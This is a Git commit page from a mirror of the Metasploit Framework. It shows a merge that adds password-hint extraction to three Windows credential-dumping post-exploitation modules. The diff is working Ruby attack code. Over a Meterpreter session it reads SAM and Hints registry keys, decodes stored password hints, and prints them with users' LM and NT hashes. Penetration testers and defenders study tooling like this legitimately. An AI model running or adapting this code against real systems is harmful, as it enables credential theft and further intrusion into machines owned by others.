infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'claudijd-master'

unstable
sinn3r 2012-08-21 14:19:45 -05:00
parent 73eab8a8ee 433c9f6b28
commit 20b3dfca9f
3 changed files with 127 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
modules/post/windows/gather/hashdump.rb
View File

@ -74,6 +74,19 @@ class Metasploit3 < Msf::Post
print_status("Decrypting user keys...") print_status("Decrypting user keys...")
users = decrypt_user_keys(hbootkey, users) users = decrypt_user_keys(hbootkey, users)
print_status("Dumping password hints...")
print_line()
hint_count = 0
users.keys.sort{|a,b| a<=>b}.each do |rid|
#If we have a hint then print it
if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
hint_count += 1
end
end
print_line "No users with password hints on this system" if hint_count == 0
print_line()
print_status("Dumping password hashes...") print_status("Dumping password hashes...")
print_line() print_line()
print_line() print_line()
@ -87,6 +100,7 @@ class Metasploit3 < Msf::Post
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0], :pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash" :type => "smb_hash"
) )
print_line hashstring print_line hashstring
end end
print_line() print_line()
@ -164,6 +178,14 @@ class Metasploit3 < Msf::Post
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
#Attempt to get Hints (from Win7/Win8 Location)
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -175,6 +197,17 @@ class Metasploit3 < Msf::Post
rid = r.type rid = r.type
users[rid] ||= {} users[rid] ||= {}
users[rid][:Name] = usr users[rid][:Name] = usr
#Attempt to get Hints (from WinXP Location) only if it's not set yet
if users[rid][:UserPasswordHint].nil?
begin
uk_hint = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
users[rid][:UserPasswordHint] = uk_hint.query_value("").data
rescue ::Rex::Post::Meterpreter::RequestError
users[rid][:UserPasswordHint] = nil
end
end
uk.close uk.close
end end
ok.close ok.close
@ -205,6 +238,15 @@ class Metasploit3 < Msf::Post
users users
end end
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")

43
modules/post/windows/gather/smart_hashdump.rb
View File

@ -140,6 +140,14 @@ class Metasploit3 < Msf::Post
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
#Attempt to get Hints (from Win7/Win8 Location)
begin
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -151,6 +159,17 @@ class Metasploit3 < Msf::Post
rid = r.type rid = r.type
users[rid] ||= {} users[rid] ||= {}
users[rid][:Name] = usr users[rid][:Name] = usr
#Attempt to get Hints (from WinXP Location) only if it's not set yet
if users[rid][:UserPasswordHint].nil?
begin
uk_hint = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
users[rid][:UserPasswordHint] = uk_hint.query_value("").data
rescue ::Rex::Post::Meterpreter::RequestError
users[rid][:UserPasswordHint] = nil
end
end
uk.close uk.close
end end
ok.close ok.close
@ -183,6 +202,16 @@ class Metasploit3 < Msf::Post
end end
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
#-------------------------------------------------------------------------------
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")
@ -273,12 +302,23 @@ class Metasploit3 < Msf::Post
print_status("\tDecrypting user keys...") print_status("\tDecrypting user keys...")
users = decrypt_user_keys(hbootkey, users) users = decrypt_user_keys(hbootkey, users)
print_status("\tDumping password hashes...") print_status("\tDumping password hints...")
hint_count = 0
users.keys.sort{|a,b| a<=>b}.each do |rid|
#If we have a hint then print it
if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
print_good("\t#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\"")
hint_count += 1
end
end
print_status("\tNo users with password hints on this system") if hint_count == 0
print_status("\tDumping password hashes...")
users.keys.sort{|a,b| a<=>b}.each do |rid| users.keys.sort{|a,b| a<=>b}.each do |rid|
# next if guest account or support account # next if guest account or support account
next if rid == 501 or rid == 1001 next if rid == 501 or rid == 1001
collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n" collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::") print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
session.framework.db.report_auth_info( session.framework.db.report_auth_info(
:host => host, :host => host,
@ -290,7 +330,6 @@ class Metasploit3 < Msf::Post
) )
end end
rescue ::Interrupt rescue ::Interrupt
raise $! raise $!
rescue ::Rex::Post::Meterpreter::RequestError => e rescue ::Rex::Post::Meterpreter::RequestError => e

43
scripts/meterpreter/hashdump.rb
View File

@ -101,6 +101,14 @@ def capture_user_keys
users[usr.to_i(16)] ||={} users[usr.to_i(16)] ||={}
users[usr.to_i(16)][:F] = uk.query_value("F").data users[usr.to_i(16)][:F] = uk.query_value("F").data
users[usr.to_i(16)][:V] = uk.query_value("V").data users[usr.to_i(16)][:V] = uk.query_value("V").data
#Attempt to get Hints (from Win7/Win8 Location)
begin
users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])
rescue ::Rex::Post::Meterpreter::RequestError
users[usr.to_i(16)][:UserPasswordHint] = nil
end
uk.close uk.close
end end
ok.close ok.close
@ -112,6 +120,17 @@ def capture_user_keys
rid = r.type rid = r.type
users[rid] ||= {} users[rid] ||= {}
users[rid][:Name] = usr users[rid][:Name] = usr
#Attempt to get Hints (from WinXP Location) only if it's not set yet
if users[rid][:UserPasswordHint].nil?
begin
uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
users[rid][:UserPasswordHint] = uk_hint.query_value("").data
rescue ::Rex::Post::Meterpreter::RequestError
users[rid][:UserPasswordHint] = nil
end
end
uk.close uk.close
end end
ok.close ok.close
@ -142,6 +161,15 @@ def decrypt_user_keys(hbootkey, users)
users users
end end
def decode_windows_hint(e_string)
d_string = ""
e_string.scan(/..../).each do |chunk|
bytes = chunk.scan(/../)
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
end
d_string
end
def convert_des_56_to_64(kstr) def convert_des_56_to_64(kstr)
key = [] key = []
str = kstr.unpack("C*") str = kstr.unpack("C*")
@ -226,6 +254,19 @@ if client.platform =~ /win32|win64/
print_status("Decrypting user keys...") print_status("Decrypting user keys...")
users = decrypt_user_keys(hbootkey, users) users = decrypt_user_keys(hbootkey, users)
print_status("Dumping password hints...")
print_line()
hint_count = 0
users.keys.sort{|a,b| a<=>b}.each do |rid|
#If we have a hint then print it
if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
hint_count += 1
end
end
print_line("No users with password hints on this system") if hint_count == 0
print_line()
print_status("Dumping password hashes...") print_status("Dumping password hashes...")
print_line() print_line()
print_line() print_line()
@ -239,7 +280,9 @@ if client.platform =~ /win32|win64/
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0], :pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash" :type => "smb_hash"
) )
print_line hashstring print_line hashstring
end end
print_line() print_line()
print_line() print_line()